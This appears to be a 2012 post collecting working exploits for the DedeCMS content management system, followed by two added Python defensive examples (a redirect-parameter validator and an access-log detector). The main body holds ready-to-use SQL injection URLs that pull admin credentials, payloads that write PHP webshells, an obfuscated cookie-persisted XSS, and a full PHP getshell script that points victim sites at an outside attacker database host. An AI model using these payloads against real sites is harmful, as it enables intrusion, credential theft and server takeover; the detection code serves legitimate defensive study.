DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14

Dedecms 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, writing a one-line shell directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser. It triggers the XSS and installs the XSS rootkit. Note that IE8/9 block URL-borne XSS, so the XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. However you then visit any of the URLs below, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php
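The login page reflects gotopage straight into its HTML, and the payload persists in a cookie, which is why every later visit re-fires it. As an added example (Python; not code from the original post or from DedeCMS), this is the check a defender would put in front of that parameter: accept only a same-site relative path, HTML-escape on output, and run the value read back from the cookie through the same validation. The default landing page name is an assumption.

```python
"""Validate the DedeCMS login 'gotopage' redirect parameter before echoing it.

Added example, not code from the original post or from DedeCMS. It models
the two checks the vulnerability above calls for: the value must be a
relative path on the same site (no scheme, no host, no leading //, no HTML
metacharacters), and whatever is written back into the login form must be
HTML-escaped. The default landing page name is an assumption.
"""
import html
from urllib.parse import unquote, urlsplit

DEFAULT_PAGE = "index.php"  # assumption: where the login form sends users by default


def safe_gotopage(raw, default=DEFAULT_PAGE):
    """Return `raw` if it is a harmless same-site relative path, else `default`."""
    if not raw:
        return default
    value = unquote(raw)  # normalise %xx so %2F%2F is seen as //
    if any(ord(c) < 0x20 or c in '<>"\'\\' for c in value):
        return default  # control characters or HTML/attribute breakers
    parts = urlsplit(value)
    if parts.scheme or parts.netloc or value.startswith("//"):
        return default  # absolute, protocol-relative or javascript: targets
    return value


def render_hidden_input(raw):
    """Build the hidden form field; escaping is kept even after validation."""
    return '<input type="hidden" name="gotopage" value="%s" />' % html.escape(
        safe_gotopage(raw), quote=True)


def gotopage_from_cookie(cookie_header):
    """The post notes the payload persists in a 'gotopage' cookie; the value read
    back from the cookie gets exactly the same check as the query parameter."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "gotopage":
            return safe_gotopage(value)
    return DEFAULT_PAGE


if __name__ == "__main__":
    for sample in ['"><script>alert(1)</script><x="', "//evil.example/",
                   "javascript:alert(1)", "/dede/index.php?x=1", "dasdasdasda"]:
        print(repr(sample), "->", render_hidden_input(sample))
    print(gotopage_from_cookie('PHPSESSID=abc; gotopage="><script>alert(1)</script>'))
```

Both the reflected value and the cookie are reduced to the default page whenever they carry markup or an off-site target, so the persistence trick described in step 2 has nothing left to replay.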
DeDeCMS (织梦) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you are taken straight into the site backend.

The precondition for this vulnerability is that the backend path must be known.

Dedecms 织梦 tag remote file write vulnerability
Precondition: you must have your own dede database prepared, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
Register a user, enter the user management backend, publish an article and upload an image, then in attachment management replace the image with our carefully constructed template; for example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(constructed here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have successfully changed the template path. 3. Visit the edited article:
Suppose the article just edited has aid 2; then we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS web site management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option></select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, which gives the 20-character MD5 password; to get the 16-character MD5, remove 3 more from the front and 1 from the back.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php page variable not initialized vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL field value overflow error together with the fact that DedeCMS writes database error messages into a PHP file without validating the file header.
1. Visit:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is shown.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the information from step 2 means the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
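Taken together, the payloads collected in this post share a handful of request shapes that are easy to alert on from access logs. The following is an added example in Python (not code from the original post or from DedeCMS) that encodes those shapes as detection rules and runs them over constructed sample log lines. Every log line, request body, hostname and client address below is constructed, and the rules cover only the indicators this post documents.

```python
"""Flag DedeCMS exploitation attempts in web-server access logs.

Added example (Python), not code from the original post or from DedeCMS.
It turns the request shapes listed in the post into detection rules:
GLOBALS/cfg_ overwrite through _COOKIE[...] / _POST[...] array keys, the
raw "sql" parameter of plus/advancedsearch.php, the _Cs[] array trick on
plus/rss.php, SQL keywords (union select, updatexml, dede_admin), script
markup in the login "gotopage" parameter, ../ traversal, {dede:...} template
tags in submitted data, and direct hits on data/mysql_error_trace.php.
Every log line and request body below is a constructed sample; the client
addresses come from documentation ranges.
"""
import re
from urllib.parse import unquote_plus

# rule name -> regex applied to the URL-decoded request (URI plus body if known)
RULES = {
    "globals_override": re.compile(
        r"(?:^|[?&])_(?:COOKIE|POST|GET|REQUEST|SERVER)\[|GLOBALS\]\[cfg_", re.I),
    "raw_sql_param": re.compile(r"advancedsearch\.php\?.*?\bsql=", re.I),
    "rss_cs_array": re.compile(r"rss\.php\?.*?_Cs\[", re.I),
    "sqli_keywords": re.compile(r"union\s+select|updatexml\s*\(|dede_admin\b", re.I),
    "reflected_xss": re.compile(r"<script|gotopage=[^&]*[<>\"]", re.I),
    "path_traversal": re.compile(r"\.\./"),
    "template_tag": re.compile(r"\{/?dede:", re.I),
    "error_trace_access": re.compile(r"/data/mysql_error_trace\.php", re.I),
}

# Apache/Nginx "combined" format: ip ident user [time] "METHOD URI PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')


def classify_request(uri, body=""):
    """Return the sorted rule names that match a request.

    URI and body are decoded twice before matching so that %3Cscript%3E,
    <script> and a double-encoded %253Cscript%253E all look the same.
    """
    text = uri + ("&" + body if body else "")
    text = unquote_plus(unquote_plus(text))
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def scan_access_log(lines):
    """Parse combined-format lines; return (ip, method, uri, status, rules) per hit.

    Only the request line is available here, so POST bodies (the mytag_js.php
    GLOBALS overwrite travels as form data) need classify_request() with the
    body taken from a WAF or application log.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, uri, status = m.groups()
        rules = classify_request(uri)
        if rules:
            hits.append((ip, method, uri, int(status), rules))
    return hits


def offenders(hits):
    """Group hits by client address: ip -> sorted list of rules it triggered."""
    seen = {}
    for ip, _method, _uri, _status, rules in hits:
        seen.setdefault(ip, set()).update(rules)
    return {ip: sorted(rules) for ip, rules in seen.items()}


# Constructed sample log (combined format): six attack requests, one benign
# request, and one POST whose body is not in the access log.
SAMPLE_LOG = [
    '203.0.113.10 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?dopost=login&validate=abcd&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=198.51.100.7&_POST[GLOBALS][cfg_dbuser]=root HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [18/Oct/2012:10:43:01 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,(SELECT%20uname%20FROM%20dede_admin),1)%23\'][0]=1 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [18/Oct/2012:10:43:09 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 37 "-" "Mozilla/5.0"',
    '192.0.2.55 - - [18/Oct/2012:10:44:00 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [18/Oct/2012:10:44:05 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '192.0.2.55 - - [18/Oct/2012:10:44:30 +0800] "GET /data/mysql_error_trace.php HTTP/1.1" 200 1 "-" "Mozilla/5.0"',
    '192.0.2.55 - - [18/Oct/2012:10:45:00 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 2 "-" "Mozilla/5.0"',
]

# Constructed form-encoded body for the POST above, as a WAF would record it.
POST_BODY_SAMPLE = ("doaction=http%3A%2F%2Fwww.example.com%2Fplus%2Fmytag_js.php%3Faid%3D1"
                    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=198.51.100.7"
                    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=x&nocache=true")
# Constructed member-area form body carrying a {dede:...} template tag.
TAG_BODY_SAMPLE = "title=t&link=a%7B/dede%3Alink%7D%7Bdede%3Afoo%7D"

if __name__ == "__main__":
    for ip, method, uri, status, rules in scan_access_log(SAMPLE_LOG):
        print(ip, method, status, ",".join(rules), uri[:60])
    print(offenders(scan_access_log(SAMPLE_LOG)))
    print(classify_request("/plus/mytag_js.php?aid=1", POST_BODY_SAMPLE))
```

The rules are deliberately narrow (specific script names and parameter shapes) so that they can run on a busy site without drowning in noise; the one broad rule, path_traversal, is kept because none of the DedeCMS endpoints named in this post legitimately take ../ in a parameter.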